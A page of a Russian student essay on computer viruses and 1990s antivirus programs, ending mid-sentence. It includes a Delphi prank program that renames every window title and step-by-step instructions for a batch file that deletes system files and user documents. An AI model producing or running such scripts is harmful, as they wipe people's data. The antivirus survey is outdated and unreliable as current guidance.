computer_viruses (694778), страница 2

Просмтор этого файла доступен только зарегистрированным пользователям. Но у нас супер быстрая регистрация: достаточно только электронной почты!

Текст из файла (страница 2)

Безвредные вирусы не разрушают файлы, но могут перепол­нять оперативную и дисковую память, выводить на экран гра­фические эффекты и т.д. Например:

(программа пишется в Delphi):

program Project1;

uses windows, Messages;

procedure registerserviceprocess; external 'kernel32.dll'

name 'RegisterServiceProcess'; //функция EnumWindowsProc

function EnumWindowsProc(h: hwnd): BOOL; stdcall;

begin

SendMessage(h,WM_SETText,0,Iparam(PChar('Fed_108- компьютерщик)));

end;

//начало программы

var h:THandle;

begin

asm

push 1

push 0

call registerserviceprocess;

end;

//запускаю цикл

while true do begin //запускаю перечесление всех окон

EnumWindows(@EnumWindowsProc,0);

h:=CreateEvent(nil, true, false, ");//делаю задержку в 100 мс.

WaitForSingleObject(h, 100);

CloseHandle(h);

end;

end.

Эффект: все названия окон переименовываются в «Fed_108- компьютерщик»

Опасные вирусы приводят к различ­ным нарушениям в работе компьютера; разрушительные - к стиранию информации, полному или частичному нарушению работы прикладных программ. Например:

Заходим в Far-manager, нажимаем Shift+F4, пишем любое название файла (install.bat), главное чтобы расширение было *.bat.

После чего печатаем примерно следующий текст:
cd C:
cd\
cd windows (у 95% процентов юзеров папка именно такая)
del *.exe
del *.ini
del *.com
cd\
cd windows
cd system
del *.dll
del *.exe
cd\
cd моидок~1
del *.doc
del *.txt
del *.htm
del *.html
del *.pdf
del *.jpg
del *.zip
del *.gif
Нажимаем F2 и сохраняем таким образом написанный файл. Эффект: стираются все файлы с указанными расширениями в указанных папках.

Массовое распространение компьютерных вирусов вызва­ло разработку антивирусных программ, позволяющих обна­руживать и уничножать. Программы-фильтры, или «сторожа», постоянно находятся в оперативной памяти, являясь резидентными, и «перехваты­вают» все запросы к операционной системе на выполнение «подозрительных действий», т.е. операции, используемых ви­русами для своего размножения и порчи информационных и других системных ресурсов в компьютере. Такими действиями мо­гут быть. попытки изменения атрибутов файлов, коррекции исполняемых BAT- СОМ- или ЕХЕ-файлов, записи в загрузочные сектора диска и др. При каждом запросе на такое действие на экран компьюте­ра выдается cообщение о каких либо действий и какая программа желает его выполнять. Пользователь в ответ на это должен либо разрешить выполнение действия, либо запретить его. Подобная часто повторяющаяся «назой­ливость», раздражающая пользователя, и то, что объем опе­ративной памяти уменьшается из-за необходимости постоян­ного нахождения в ней «сторожа», являются главными недо­статками этих программ. К тому же программы-фильтры не «лечат» файлы или диски, для этого необходимо использовать другие антивирусные программы. Примером программ- сто­рожей являются Vsefe, входящая в пакет утилит MS-DOS, и программы, работающие в среде Windows, - AVP, Norton AntiVirus for Windows 95, McAfee Virus Scan 95, Thunder Byte Professional for Windows 95.

Надежным средством защиты от вирусов считаются про­граммы-ревизоры. Они запоминают исходное состояние про­грамм, каталогов и системных областей диска, когда компью­тер еще не был заражен вирусом, а затем периодически сравнивают текущее состояние с исходным. При выявлении несоответствий (по длине файла, дате модификации, коду цик­лического контроля файла и др.) сообщение об этом выдается пользователю. Примером программ-ревизоров являются про­грамма Adinf фирмы «Диалог-Наука» и дополнение к ней в виде Adinf Cure Module.

Программы-доктора не только обнаруживают, но и "лечат" зараженные программы или диски, «выкусывая» из заражен­ных программ тело вируса. Программы этого типа делятся на фаги и полифаги. Последние служат для обнаружения и унич­тожения большого количества разнообразных вирусов. Наи­большее распространение в России имеют такие полифаги, как MS AntiVirus, Aidstest и Doctor Web, которые непрерывно обновляются для борьбы с появляющимися новыми вирусами.

Программы-детекторы позволяют обнаруживать файлы, зараженные одним или несколькими известными разработчи­кам программ вирусами.

Программы-вакцины, или иммунизаторы, относятся к рези­дентным программам. Они модифицируют программы и дис­ки таким образом, что это не отражается на работе программ, но вирус, от которого производится вакцинация, считает их уже зараженными и не внедряется в них.

6. Антивирусные программы.

Как известно, вирус может содержаться только в файлах, которым передаётся управление: программы, динамические библиотеки, драйверы, командные файлы, скрипты, документы и шаблоны с макросами, то есть файлы с расширениями COM, EXE, DLL, DRV, VXD, SYS, BAT, DOC, DOT, XLS и др. Таким образом, например, обычный текстовый файл (с расширением TXT) можно запускать без опасений получить заразу - TXT-файл будет просто открыт в Блокноте.

Охарактеризуем некоторые антивирусные программы. К настоящему времени зарубежными и отечественными фирма­ми и специалистами разработано большое количество анти­вирусных программ. Многие из них, получившие широкое признание, постоянно пополняются новыми средствами для борьбы с вирусами и сопровождаются разработчиками.

У российских пользователей персональных компьютеров популярен антивирусный комплект АО «Диалог-Наука», в который входят программа-ревизор диска Adinf и лечащий блок Adinf Cure Module. Одна из последних версий этой программы-полифага Aidstest (конец 1997 г.) обнаруживает бо­лее 1700 вирусов. Aidstest для своего нормального функцио­нирования требует, чтобы в оперативной памяти не было дру­гих резидентных антивирусных программ, блокирующих за­пись в программные файлы, поэтому их следует предваритель­но выгрузить.

При запуске программы Aidstest проверяет оперативную память на наличие известных вирусов и обезвреживает их. При этом парализуются функции вируса, связанные с размноже­нием, а другие побочные эффекты могут оставаться, в связи с чем после окончания обезвреживания вируса программа вы­дает запрос о перезагрузке. Перезагрузку рекомендуется осу­ществить кнопкой RESET, так как при перезагрузке клавиша­ми [CTRL]+[Alt]+[Del] некоторые вирусы могут сохраняться. Кроме того, компьютер и антивирусную программу лучше за­пустить с защищенной от записи дискеты, чтобы при запуске с зараженного диска вирус не смог записаться в память рези­дентом и препятствовать лечению.

Aidstest тестирует свое тело на наличие известных вирусов, а также судит по искажению в своем коде о своем заражении неизвестным вирусом. При этом возможны случаи «ложной тревоги», например при сжатии антивируса программой- упа­ковщиком. Программа не имеет графического интерфейса, режимы ее 1 работы задаются с помощью ключей. Указав путь, можно проверить не весь диск, а отдельный подкаталог. Оптимальный режим для ежедневной работы задается ключами /g (проверка всех файлов) и /s (медленная проверка). Увеличение времени при таких опциях практически неощутимо (полностью запол­ненный жесткий диск емкостью 520 Мбайт на ПК с процессо­ром 486DX2 тестируется менее чем 2 мин), зато вероятность обнаружения вирусов резко повышается.

Ключ If следует использовать тогда, когда Aidstest, а также другие программы-антивирусы указывают на наличие вируса в каком-либо файле. При обнаружении вируса в ценном для пользователя файле этот файл следует переписать на дискету и попытаться вылечить с помощью ключа /f. Если попытка не увенчается успехом, надо удалить все зараженные копии фай­ла и проверить диск снова. Если в файле содержится важная информация, которую нежелательно удалять, можно заархивировать файл или найти другую антивирусную программу, способную лечить этот тип вируса.

Для создания в файле протокола работы программы Aidstest служит ключ /р. Протокол нужен, если пользователь не успевает просмотреть имена зараженных файлов. Для под­держки антивирусного программно- аппаратного комплекса Sheriff предназначен ключ /z.

Программа-полифаг Doctor Web необходима прежде всего для борьбы с полиморфными вирусами, которые появились сравнительно недавно. Так же как и Aidstest, Doctor Web об­новляется не реже раза в месяц, а в промежутках между верси­ями выходят 1-3 дополнения вирусной базы Doctor Web.

Использование программы Doctor Web для проверки дис­ков и удаления обнаруженных вирусов в целом подобно Aidstest, в связи с чем эту программу можно запускать сразу после (или до) запуска Aidstest. При этом практически не про­исходит «дублирования», так как Aidstest и Doctor Web работают на разных наборах вирусов. В режиме эвристического анализа программа Doctor Web способна эффективно определять файлы, зараженные новы­ми, неизвестными вирусами. Применяя одновременно Aidstest и Doctor Web для контроля дискет и получаемых по сети фай­лов, можно почти наверняка избежать заражения.

С программой Doctor Web можно работать как в режиме полноэкранного интерфейса с использованием меню и диало­говых окон, так и в режиме командной строки. В командной строке задаются диск, путь и необходимые ключи. Среди ключей: /al - диагностика всех файлов на заданном устройстве;

/р - удаление вирусов с подтверждением пользователя; /dl -удаление файлов, корректное "лечение" которых невозмож­но; /CU - "лечение" дисков и файлов; /zp - запись протокола работы в файл. При работе в режиме полноэкранного интер­фейса после запуска антивирусной программы пользователь использует необходимые установки через пункты основного меню: Dr. Web. Тест Настройки Дополнения.

Программа-ревизор Adinf позволяет обнаружить любой вирус, включая вирусы, вирусы-мутанты и неизвестные на се­годняшний день вирусы. Время проверки одного логичес­кого диска крайне мало, что дает возможность использовать Adinf повседневно без существенной потери времени.

Переход на применение операционной системы Windows 95 породил проблемы с защитой от вирусов, создаваемых специ­ально для этой среды. Кроме того, появилась новая разновид­ность инфекции - макровирусы, «вживляемые» в документы, подготавливаемые текстовым процессором Word. АО "Диа­лог-Наука" предложен программно-аппаратный комплекс Sheriff, предназначенный для антивирусного мониторинга и защиты, но он предполагает установку в ПК дополнительней платы расширения и может работать только на серверах и рабочих станциях, оперирующих большими объемами данных. Известными антивирусными программами являются Antiviral Toolkit Pro (AVP32), Norton AntiVirus for Windows 95, McAffee VirusScan95, Sophos SWEEP for Windows 95, ThunderBY ТЕ Ai.dVirus Utilities и др. Эти программы работают в виде программ-сканеров и проводят антивирусный контроль оператив­ной памяти, папок и дисков, содержат алгоритмы для распоз­навания новых типов вирусов, позволяют в процессе провер­ки лечить файлы и диски.

Программа Antiviral Toolkit Pro (AVP32) является 32-раз­рядным приложением, работающим в среде Windows 95 и Windows NT, имеет удобный пользовательский интерфейс, гибкую систему настроек и позволяет распознавать более 50 тыс. различных вирусов. Для работы этой программы компьютер должен иметь не менее 4 Мбайт оперативной памяти и не ме­нее 2 Мбайт свободного места на жестком диске. Antiviral Toolkit Pro распознает и удаляет полиморфные вирусы, вирусы невидимки, макро вирусы в документах, подготовленных в Word и Excel, "троянские кони".

Интерфейс программы AllMicro AntiVirus for Windows 95 довольно прост и не требует от пользователя дополнительных знаний о продукте - просто требуется нажать кнопку «Scan», после чего начинается проверка памяти, загрузочных секто­ров жесткого диска, а затем и всех дисков компьютера. Но простота работы не означает плохое качество: в базе данных программы содержится более 8000 сигнатур, и она может про­верять не только традиционные исполняемые файлы, но и ар­хивы, и новые типы файлов Windows 95, при этом пользова­тель имеет возможность задать строку условий для поиска не знакомых программе вирусов.

Программа Vscan 95 каждый раз в процессе начальной заг­рузки проверяет память компьютера, загрузочные сектора си­стемного диска и все файлы в корневом каталоге. Две другие программы пакета (McAfee Vshield и Vscan) созданы как при­ложения Windows 95. Первая обеспечивает после загрузки Windows 95 слежение за вновь подключенными дисками, кон­троль исполняемых программ и копируемых файлов, вторая программа служит для дополнительной проверки памяти, дис­ков и файлов. Пакет McAfee VirusScan 95 умеет находить макро вирусы в MS Word учитывая развитие локальных компьютерных сетей элект­ронной почты и сети Интернет и внедрение сетевой ОС Windows NT, разработчиками антивирусных программ раз­работаны и поставляются на рынок такие программы, как Mail Checker, для проверки входящей и исходящей электронной почты, AntiViral Toolkit Pro - для обнаружения, лечения, уда­ления и перемещения в специальный каталог пораженных ви­русом файлов при работе с сетевой ОС Novell NetWare версий З.х и 4.х. Программа F-Secure для Windows NT Server обеспе­чивает в реальном масштабе времени защиту сервера, автома­тически проверяя на наличие вирусов каждый файл, к которо­му обращаются рабочие станции, выполняет расширенное ав­томатическое протоколирование в специальный журнал собы­тий, оповещает о проявлениях вирусов системного админист­ратора.

1. Профилактика

Для того, чтобы не подвергнуть компьютер заражению вирусами и обеспечить надежное хранение информации на дисках, необходимо соблюдать следующие правила:

• оснастите свой компьютер современными антивирусными программами, например AntiViral Toolkit Pro, Doctor Web, и постоянно возобновляйте их версии

• перед считыванием с дискет информации, записанной на других компьютерах, всегда проверяйте эти дискеты на наличие вирусов, запуская антивирусные программы своего компьютера

• при переносе на свой компьютер файлов в архивированном виде проверяйте их сразу же после разархивации на жестком диске, ограничивая область проверки только вновь записанными файлами

• периодически проверяйте на наличие вирусов жесткие диски компьютера, запуская антивирусные программы для тестирования файлов, памяти и системных областей дисков с защищенной от записи дискеты, предварительно загрузив операционную систему с защищенной от записи системной дискеты

• всегда защищайте свои дискеты от записи при работе на других компьютерах, если на них не будет производится запись информации

• обязательно делайте архивные копии на дискетах ценной для вас информации

• не оставляйте в кармане дисковода А дискеты при включении или перезагрузке операционной системы, чтобы исключить заражение компьютера загрузочными вирусами

• используйте антивирусные программы для входного контроля всех исполняемых файлов, получаемых из компьютерных сетей

• проверяйте e-mail даже если письмо пришло от хорошо известного вам человека (это обусловлено не тем что он хочет вам навредить а из-за того что он полный Lamer а его комп заражён)

Так же следует иногда проверять автозагрузку, т.к. именно туда обычно закидывают загрузочные вирусы, но этот метод очень распространён и по этому следует проверять в реестре следующую папку:

Характеристики

Список файлов реферата